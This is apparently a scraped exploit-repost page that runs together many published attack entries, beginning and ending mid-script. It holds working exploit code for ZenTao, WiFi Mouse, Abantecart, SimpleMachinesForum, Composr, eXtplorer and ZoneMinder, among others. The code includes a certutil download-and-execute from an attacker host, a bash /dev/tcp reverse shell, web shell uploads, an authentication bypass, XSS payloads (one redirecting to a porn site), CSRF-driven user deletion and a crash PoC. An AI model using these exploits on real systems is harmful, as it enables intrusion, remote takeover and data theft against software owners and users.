target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content) if __name__ == '__main__': main()
HireHackking

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: Sinem Şahin # Date: 2022-10-08 # Vendor Homepage: https://www.csphere.eu/ # Version: 2011.4 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872 2- Write XSS Payload into the username of the buddy list create. 3- Press "Save" button. XSS Payload ==> "<script>alert("usernameXSS")</script> Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md
HireHackking

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE) # Date: 13-10-2022 # Author: Payal # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.2 # Tested on: Windows 10 Pro Build 21H2 # Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_STREAMfrom time import sleepimport sysimport string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3]except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()
HireHackking

Abantecart v1.3.2 - Authenticated Remote Code Execution

HACKER · %s · %s

# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 3rd Mar'2022 # CVE ID: CVE-2022-26521 # Confirmed on release 1.3.2 # Vendor: https://www.abantecart.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions #Step3- Now Goto Add Media=>Add Resource=> Upload php web shell #Step4- Copy the Resource URL location and execute it in the browser e.g. : Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532 Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux 11:17:51 up 2:15, 1 user, load average: 1.91, 1.93, 1.52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bitnami tty1 - 09:05 1:05m 0.20s 0.01s -bash uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $
HireHackking

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

HACKER · %s · %s

# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 7th March 2022 # CVE ID: CVE-2022-26982 # Confirmed on release 2.1.1 # Vendor: https://download.simplemachines.org/ # Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor! ############################################### #Step1- Login with Admin Credentials #Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php #Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?> #Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page #Step5- Now click on "Themes and Layout" and you will get the reverse shell: E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276 bash: cannot set terminal process group (1334): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/simplemachinesforum$ whoami whoami daemon daemon@debian:/opt/bitnami/simplemachinesforum$ id id uid=1(daemon) gid=1(daemon) groups=1(daemon) daemon@debian:/opt/bitnami/simplemachinesforum$
HireHackking

Password Manager for IIS v2.0 - XSS

HACKER · %s · %s

# Exploit Title: Password Manager for IIS v2.0 - XSS # Exploit Author: VP4TR10T # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/ # Software Link: http://passwordmanager.adiscon.com/ <http://passwordmanager.adiscon.com/> # Version: *Version 2.0 # Tested on: WINDOWS # CVE : CVE-2022-36664 Affected URI (when changing user password): POST /isapi/PasswordManager.dll HTTP/1.1 Affected Parameter in http payload:*ReturnURL*=<script>alert(document.cookie)</script> *Cordially,*
HireHackking

Canteen-Management v1.0 - XSS-Reflected

HACKER · %s · %s

## Exploit Title: Canteen-Management v1.0 - XSS-Reflected ## Exploit Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/> ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management ## Description: The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can craft a very malicious HTTPS URL redirecting to a very malicious URL. When the victim clicks into this crafted URL the game will over for him. [+]Payload REQUEST: ```HTML GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22 https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+]Payload RESPONSE: ```burp HTTP/1.1 200 OK Date: Tue, 04 Oct 2022 09:44:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6140 Connection: close Content-Type: text/html; charset=UTF-8 <link rel="stylesheet" href="assets/css/popup_style.css"> <style> .footer1 { position: fixed; bottom: 0; width: 100%; color: #5c4ac7; text-align: center; } </style> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content=""> <link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png"> <style type="text/css"> @media print { #printbtn { display : none; } } </style> <title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title> <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet"> <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" /> <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" /> <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/helper.css" rel="stylesheet"> <link href="assets/css/style.css" rel="stylesheet"> <link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" /> <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet"> <link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet"> <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet"> <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet"> <script type="text/javascript" src=" https://www.gstatic.com/charts/loader.js"></script> <script type="text/javascript"> google.charts.load("current", {packages:["corechart"]}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['Food', 'Average sale per Day'], ['Masala dosa', 11], ['Chicken 65 ', 2], ['Karapu Boondi', 2], ['Bellam Gavvalu', 2], ['Gummadikaya Vadiyalu', 7] ]); var options = { title: 'Food Average Sale per Day', pieHole: 0.4, }; var chart = new google.visualization.PieChart(document.getElementById('donutchart')); chart.draw(data, options); } </script> </head> <body class="fix-header fix-sidebar"> <div id="page"></div> <div id="loading"></div> <div id="main-wrapper"> <div class="unix-login"> <div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover"> <div class="row"> <div class="col-lg-4 ml-auto"> <div class="login-content"> <div class="login-form"> <center><img src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br> <form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/ raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm"> <div class="form-group"> <input type="text" name="username" id="username" class="form-control" placeholder="Username" required=""> </div> <div class="form-group"> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required=""> </div> <button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button> <!-- <div class="forgot-phone text-right f-right"> <a href="#" class="text-right f-w-600"> Forgot Password?</a> </div> --> <div class="forgot-phone text-left f-left"> <a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a> </div> </form> </div> </div> </div> </div> </div> </div> </div> <script src="./assets/js/lib/jquery/jquery.min.js"></script> <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script> <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script> <script src="./assets/js/jquery.slimscroll.js"></script> <script src="./assets/js/sidebarmenu.js"></script> <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script> <script src="./assets/js/custom.min.js"></script> <script> function onReady(callback) { var intervalID = window.setInterval(checkReady, 1000); function checkReady() { if (document.getElementsByTagName('body')[0] !== undefined) { window.clearInterval(intervalID); callback.call(this); } } } function show(id, value) { document.getElementById(id).style.display = value ? 'block' : 'none'; } onReady(function () { show('page', true); show('loading', false); }); </script> </body> </html> ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management ) ## Proof and Exploit: [href](https://streamable.com/emg0zo) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking
# Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 12th January,2022 # CVE ID: CVE-2021-46360 # Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS # Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py # Vendor: https://compo.sr/download.htm ############################################### #Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr #!/usr/bin/python3 import requests from bs4 import BeautifulSoup import time cookies = { 'has_cookies': '1', 'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic 'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D', 'last_visit': '1641783779', 'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic } headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': '*/*', 'Origin': 'http://192.168.56.116', 'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr', 'Accept-Language': 'en-US,en;q=0.9', } params = ( ('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic ) data = { '_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell) 'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic } r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False) soup = BeautifulSoup(r.text, 'html.parser') #datap=response.read() print (soup) #Step2- Now visit the Content=>File/Media Library and then upload any .php web shell ( #Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell: ┌─[ci@parrot]─[~] └──╼ $nc -lvvnp 4444 listening on [any] 4444 ... connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984 Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $ pwd / $
HireHackking

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path # Exploit by: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.gestionaleopen.org/ # Software Link : https://www.gestionaleopen.org/download/ # Tested Version: 12.00.00 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """ DB_GO_80 DB_GO_80 C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 Auto # Service info: C:\>sc qc "DB_GO_80" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DB_GO_80 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO_80 DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.sysax.com/ # Software Link: https://www.sysax.com/download/sysaxserv_setup.msi # Tested Version: 6.95 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Sysax_Multi_Server_6.95.py # 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard # 3.- Open "Sysax Multi Server" # 4.- Manage Server Settings... # 5.- Administrative Settings -> Configure... # 6.- Clic "Enable web based administration and API access" # 7.- Login -> admin # 8.- Paste ClipBoard on "Password" # 9.- Save # 10.- Crashed #!/usr/bin/env python buffer = "\x41" * 800 f = open ("Sysax_Multi_Server_6.95.txt", "w") f.write(buffer) f.close()
HireHackking
# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) # Exploit Author: ErPaciocco # Author Website: https://erpaciocco.github.io # Vendor Homepage: https://extplorer.net/ # # Vendor: # ============== # extplorer.net # # Product: # ================== # eXtplorer <= v2.1.14 # # eXtplorer is a PHP and Javascript-based File Manager, it allows to browse # directories, edit, copy, move, delete, # search, upload and download files, create & extract archives, create new # files and directories, change file # permissions (chmod) and more. It is often used as FTP extension for popular # applications like Joomla. # # Vulnerability Type: # ====================== # Authentication Bypass (& Remote Command Execution) # # # Vulnerability Details: # ===================== # # eXtplorer authentication mechanism allows an attacker # to login into the Admin Panel without knowing the password # of the victim, but only its username. This vector is exploited # by not supplying password in POST request. # # # Tested on Windows # # # Reproduction steps: # ================== # # 1) Navigate to Login Panel # 2) Intercept authentication POST request to /index.php # 3) Remove 'password' field # 4) Send it and enjoy! # # # Exploit code(s): # =============== # # Run below PY script from CLI... # # [eXtplorer_auth_bypass.py] # # Proof Of Concept try: import requests except: print(f"ERROR: RUN: pip install requests") exit() import sys import time import urllib.parse import re import random import string import socket import time import base64 TARGET = None WORDLIST = None _BUILTIN_WL = [ 'root', 'admin', 'test', 'guest', 'info', 'adm', 'user', 'administrator' ] _HOST = None _PATH = None _SESSION = None _HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive' } def detect(): global _HOST global _PATH global _SESSION global _HEADERS _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') _SESSION = requests.Session() raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) if raw.status_code == 200: ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) if int(ver[0][2]) < 15: return True return False def auth_bypass(): global _HOST global _PATH global _SESSION global _HEADERS global WORDLIST global _BUILTIN_WL _HEADERS['X-Requested-With'] = 'XMLHttpRequest' params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': 'admin', 'lang':'english'} if WORDLIST != None: if WORDLIST == _BUILTIN_WL: info(f"Attempting to guess an username from builtin wordlist") wl = _BUILTIN_WL else: info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") with open(WORDLIST[0], "r") as f: wl = f.read().split('\n') for user in wl: params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': user, 'lang':'english'} info(f"Trying with {user}") res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return (user) else: res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return ('admin') return False def rce(): global _HOST global _PATH global _SESSION global _HEADERS global _PAYLOAD tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] info(f"CSRF Token obtained: {token}") payload = editPayload() info(f"Payload edited to fit local parameters") params = {'option': 'com_extplorer', 'action': 'upload', 'dir': f"./{_PATH}", 'requestType': 'xmlhttprequest', 'confirm':'true', 'token': token} name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) files = {'userfile[0]':(f"{name}.php", payload)} req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) if "successful" in req.text: info(f"File {name}.php uploaded in root dir") info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") def attack(): if not TARGET: error("TARGET needed") if TARGET: if not detect(): error("eXtplorer vulnerable instance not found!") exit(1) else: info("eXtplorer endpoint is vulnerable!") username = auth_bypass() if username: info("Auth bypassed!") rce() else: error("Username 'admin' not found") def error(message): print(f"[E] {message}") def info(message): print(f"[I] {message}") def editPayload(): # You can generate payload with msfvenom and paste below base64 encoded result # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64 return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") def help(): print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution Usage: python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb] Options: -t Target host. Provide target IP address (and optionally port). -w Wordlist for user enumeration and authentication (Optional) -wb Use built-in wordlist for user enumeration (Optional) -h Show this help menu. """) return True args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), "h" : (0, lambda *x: (help() and exit(0)))} if __name__ == "__main__": i = 1 [ args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) for arg in [k for k in sys.argv[i:] ] if arg[0] == '-' ] attack() else: help() # /////////////////////////////////////////////////////////////////////// # [Script examples] # # # c:\>python eXtplorer_auth_bypass.py -t https://target.com # c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt # c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb # Exploitation Method: # ====================== # Remote # [+] Disclaimer # The information contained within this advisory is supplied "as-is" with no # warranties or guarantees of fitness of use or otherwise. # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and # that due credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit # is given to the author. The author is not responsible for any misuse of the # information contained herein and accepts no responsibility # for any damage caused by the use or misuse of this information.
HireHackking

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

HACKER · %s · %s

# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) # Date: 10/01/2022 # Exploit Author: Trenches of IT # Vendor Homepage: https://github.com/ZoneMinder/zoneminder # Version: v1.36.26 # Tested on: Linux/Windows # CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 # Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ # # Proof of Concept: # 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) # 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log # 3 - XSS executes delete function on target UID (user). import requests import re import time import argparse import sys def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options options = getOptions(sys.argv[1:]) payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>" #Request to login and get the response headers loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession) #Request using response headers to obtain CSRF value csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) 